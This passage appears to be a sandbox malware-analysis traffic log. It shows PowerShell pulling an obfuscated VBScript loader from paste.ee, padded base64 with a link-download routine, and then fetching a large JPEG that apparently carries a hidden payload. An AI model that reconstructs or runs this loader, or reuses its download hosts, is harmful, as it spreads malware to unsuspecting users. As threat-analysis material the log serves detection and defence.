                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: paste.ee
                Connection: Keep-Alive
                2024-05-23 16:32:42 UTC1238INHTTP/1.1 200 OK
                Date: Thu, 23 May 2024 16:32:42 GMT
                Content-Type: text/plain; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Cache-Control: max-age=2592000
                strict-transport-security: max-age=63072000
                x-frame-options: DENY
                x-content-type-options: nosniff
                x-xss-protection: 1; mode=block
                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yLS%2F9icaGXgTSD8%2Fyg5AfVgq2WJb15I4Zg0Qlc8mKdGN2eH%2FE7ZEtzylyYolZugop2cPh5H06YBR5zAaUvMFJ76%2Bn4tf7QMNSdSaJIzo28gZOd%2BjHYWquONH2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 88867189aa9a437a-EWR
                alt-svc: h3=":443"; ma=86400
                2024-05-23 16:32:42 UTC131INData Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 6d 75 64 61 64 6f 72 20 2c 20 74 61 75 72 69 6d 20 2c 20 61 6c 69 67 75 6c 61 64 6f 20 2c 20 65 6e 6a 61 75 6c 61 72 20 2c 20 6c 69 6e 67 75 65 74 65 20 2c 20 43 61 6d 61 20 2c 20 6c 69 6e 67 75 65 74 65 31 0d 0a 20 20 20 20 20 74 61 75 72 69 6d 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 61 6c 69 67 75 6c 61 64 6f 20 20 3d 20 22 22 20 26 20
                Data Ascii: 1f7f dim mudador , taurim , aligulado , enjaular , linguete , Cama , linguete1 taurim = " " aligulado = "" &
                2024-05-23 16:32:42 UTC1369INData Raw: 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74 44 67 54 72 65 43 44 67
                Data Ascii: enjaular & taurim & enjaular & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDg
                2024-05-23 16:32:42 UTC1369INData Raw: 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 51 42 68 44 67 54 72 65 47 4d 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 67 44
                Data Ascii: eQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & enjaular & taurim & enjaular & "gBvDgTreHIDgTre" & enjaular & taurim & enjaular & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgD
                2024-05-23 16:32:42 UTC1369INData Raw: 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 47 49 44 67 54 72 65 63 67 44 67 54 72 65 76 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a
                Data Ascii: redQBwDgTreGwDgTrebwBhDgTreGQDgTre" & enjaular & taurim & enjaular & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & enjaular & taurim & enjaular & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTre" & enjaular & taurim & enj
                2024-05-23 16:32:42 UTC1369INData Raw: 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 51 42 43 44 67 54 72 65 48 6b 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67
                Data Ascii: TreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & enjaular & taurim & enjaular & "QBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDg
                2024-05-23 16:32:42 UTC1369INData Raw: 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 52 67 42 73 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 44 77 44 67 54 72 65 50 44 67 54 72 65 42 43 44 67 54 72 65 45 45 44 67 54 72 65 55 77 42 46 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 66 44 67 54 72 65 45 55 44 67 54 72 65 54 67 42 45 44 67 54 72 65 44 34 44 67 54 72 65 50 67 44 67 54 72 65 6e 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54
                Data Ascii: re" & enjaular & taurim & enjaular & "QBuDgTreGQDgTreRgBsDgTreGEDgTre" & enjaular & taurim & enjaular & "wDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgT
                2024-05-23 16:32:42 UTC1095INData Raw: 61 75 6c 61 72 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 4b 51 44 67 54 72 65 67 44 67 54 72 65 48 73 44 67 54 72 65 49 44 67 54 72
                Data Ascii: aular & "QBuDgTreGQDgTreSQBuDgTreGQDgTre" & enjaular & taurim & enjaular & "QB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTre" & enjaular & taurim & enjaular & "DgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTr
                2024-05-23 16:32:42 UTC1369INData Raw: 31 37 66 63 0d 0a 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 56 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 64 44 67 54 72 65 44 67 54 72 65 75 44 67 54 72 65 46 4d 44 67 54 72 65 64 51 42 69 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 51 42 34 44 67 54 72
                Data Ascii: 17fcDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & enjaular & taurim & enjaular & "QB4DgTr
                2024-05-23 16:32:42 UTC1369INData Raw: 67 44 67 54 72 65 4a 44 67 54 72 65 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 45 49 44 67 54 72 65 65 51 42 30 44 67 54 72 65 47 55 44 67 54 72 65 63 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 51 44 67 54 72 65 65 51 42 77 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77
                Data Ascii: gDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTre" & enjaular & taurim & enjaular & "DgTreBBDgTreHMDgTrecw
                2024-05-23 16:32:42 UTC1369INData Raw: 6b 44 67 54 72 65 47 49 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 35 44 67 54 72 65 44 67 44 67 54 72 65 4e 67 44 67 54 72 65 39 44 67 54 72 65 47 30 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 6d 44 67 54 72 65 47 51 44 67 54 72 65 4f 51 42 68 44 67 54 72 65 47 4d 44 67 54 72 65 4d 77 44 67 54 72 65 7a 44 67 54 72 65 44 59 44 67 54 72 65 4e 67 44 67 54 72 65 39 44 67 54 72 65 48 4d 44 67 54 72 65 61 51 44 67 54 72 65 6d 44 67 54 72 65 47 51 44 67 54 72 65 4d 51 42 6a 44 67 54 72 65 44 45 44 67 54 72 65 4e 51 44 67 54 72 65 7a 44 67 54 72 65 44 59 44 67 54 72 65 4e 67 44 67 54 72 65 39 44 67 54 72 65 48 67 44 67 54 72 65 22 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 74 61 75 72 69 6d 20 26 20 65 6e 6a 61 75 6c 61 72 20 26 20 22 51 44 67 54 72 65
                Data Ascii: kDgTreGIDgTreODgTreDgTre5DgTreDgDgTreNgDgTre9DgTreG0DgTreaDgTreDgTremDgTreGQDgTreOQBhDgTreGMDgTreMwDgTrezDgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGQDgTreMQBjDgTreDEDgTreNQDgTrezDgTreDYDgTreNgDgTre9DgTreHgDgTre" & enjaular & taurim & enjaular & "QDgTre


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.749708188.114.97.34431988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-05-23 16:32:46 UTC124OUTGET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1
                Host: uploaddeimagens.com.br
                Connection: Keep-Alive
                2024-05-23 16:32:46 UTC694INHTTP/1.1 200 OK
                Date: Thu, 23 May 2024 16:32:46 GMT
                Content-Type: image/jpeg
                Content-Length: 4198361
                Connection: close
                Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT
                ETag: "6627c3ad-400fd9"
                Cache-Control: max-age=2678400
                CF-Cache-Status: HIT
                Age: 369
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l7FsjlexF5A6pxzYJ2xzQnYngwQnJqT2jgzRRSzAQUXgKF4cXMFW%2F4fIMYCKlVz5H6kT4tmggRUA7i9DCfrf6Ew3pM9byW26%2BYrZCNjzUy1qHOd9h%2FqOcmMqcQ5zA4CBxFuv220i9FeT"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 888671a0c9be19c7-EWR
                alt-svc: h3=":443"; ma=86400
                2024-05-23 16:32:46 UTC675INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                2024-05-23 16:32:46 UTC1369INData Raw: 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43
                Data Ascii: .TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC
                2024-05-23 16:32:46 UTC1369INData Raw: 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab
                Data Ascii: %VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV
                2024-05-23 16:32:46 UTC1369INData Raw: 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e
                Data Ascii: Tr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
                2024-05-23 16:32:46 UTC1369INData Raw: f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d
                Data Ascii: HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}
                2024-05-23 16:32:46 UTC1369INData Raw: a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76
                Data Ascii: RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imv
                2024-05-23 16:32:46 UTC1369INData Raw: 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90
                Data Ascii: .f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
                2024-05-23 16:32:46 UTC1369INData Raw: 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23
                Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
